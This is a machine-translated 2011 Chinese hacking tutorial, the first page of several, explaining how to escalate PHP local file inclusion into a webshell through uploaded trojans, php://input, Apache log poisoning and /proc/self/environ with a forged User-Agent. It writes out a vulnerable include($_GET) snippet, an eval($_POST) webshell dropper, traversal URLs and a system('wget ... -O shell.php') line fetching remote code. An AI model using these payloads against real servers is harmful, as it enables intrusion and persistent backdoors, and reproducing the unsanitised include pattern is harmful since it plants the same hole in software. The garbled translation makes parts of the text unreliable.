PHP security of the LFI vulnerability in GetShell method of the big parade-vulnerability warning-the black bar safety net

2011-10-04T00:00:00
ID MYHACK58:62201132008
Type myhack58
Reporter 佚名
Modified 2011-10-04T00:00:00

Description

Author:LengF Blog:www.81sec.com

0x00 digression About PHP LFI(Local File Include,local file inclusion)vulnerabilities many of my friends are not very familiar with, in fact, the network has a lot of information in this regard, in particular, that foreign paper. Although a lot of information speaks not very detailed, but everyone is too lazy to test, this article will give you a summary, and tell the complete use of the method. [separator] 0x01 LFI. GETSHELL ideas In tells how to use LFI to or webshell before, had to remind everyone to php5. 3. 4 truncation bug has been fixed, so in some cases cannot be successfully exploited also not surprising. 1. Contains Upload File As long as the target server supports the upload, whether it is jpg, txt, gif, etc. can, which contains the word Trojan can be, this method is very simple nothing to say. 2. Contains data:// or php://input pseudo protocols The use of this method is the premise of php. ini allow_url_include=On, and in addition must support the php://filter pseudo Protocol We to try such a case, assuming there is a file that contains exploit code is as follows:

<? php $query=$_GET[‘p’]; Include($query); ?& gt;

On allow_url_include=On is remote file includes, the assumption here is off, then only the local contains. So how do we use, and we'll talk about the use of PHP Input/Ouput Wrapper to obtain webshell. I'm going to write up a use of the program, as shown in Figure 0 A 1:

! This exploits on this. This vulnerability for php5. 0 the following is valid, 5.3 test fails, other everyone self-summary. Still relatively tasteless, but no loss is a good idea. 3. Log contains the log file Log included, this is still relatively practical, generally apache or other logs will be relatively large, and why we can log getwebshell it? Such as apache, when we visit a website page, error page, the server will record the access to the connection address, if we take the malicious code then this will be included in the log file. So we generally use the following steps: First of all visit a not exist page, and carry malicious code, such as the evil code:

<? php fputs(fopen("/www/shell.php","W+"),"<? php eval($_POST[a]?& gt;";?& gt;

It will be converted to url-encoded, and then access the <http://www.81sec.com/+urlencode>(evil code) This page certainly does not exist, then in the error log it will form a strip of such a log, the next, we included this log: <http://www.81sec.com/test.php?p>= ... pache/www_error. log apache path need to own to guess, I'm here just to give an example, access will generate a shell. 4. Contains/proc/self/environ the environment variables One is to use the Linux environment variables as a basis, many times this method will not work, because there is no/proc/self/environ access. With Read/etc/passwd the same, if

You access/proc/self/environ as Figure 0 2: a

!

See this code you know why use this Linux the environment variable, where will the user access the web session information, which will also contain the user-agent parameter this parameter you browser the name of the parameter. And this parameter in our client can be modified. For the above, the LFI code, we can use: <http://www.81sec.com/test.php?p=../../../../proc/self/environ> If you can get on a figure similar to the description of content have the right to limit, You can use the following method to get the webshell, I will two methods. Method one: with the firefox plugin user agent switch The use method is very simple is also very convenient. We first construct their own evil code:

<? system('wget <http://81sec.com/shell.txt> -O shell.php');?& gt;

[1] [2] [3] next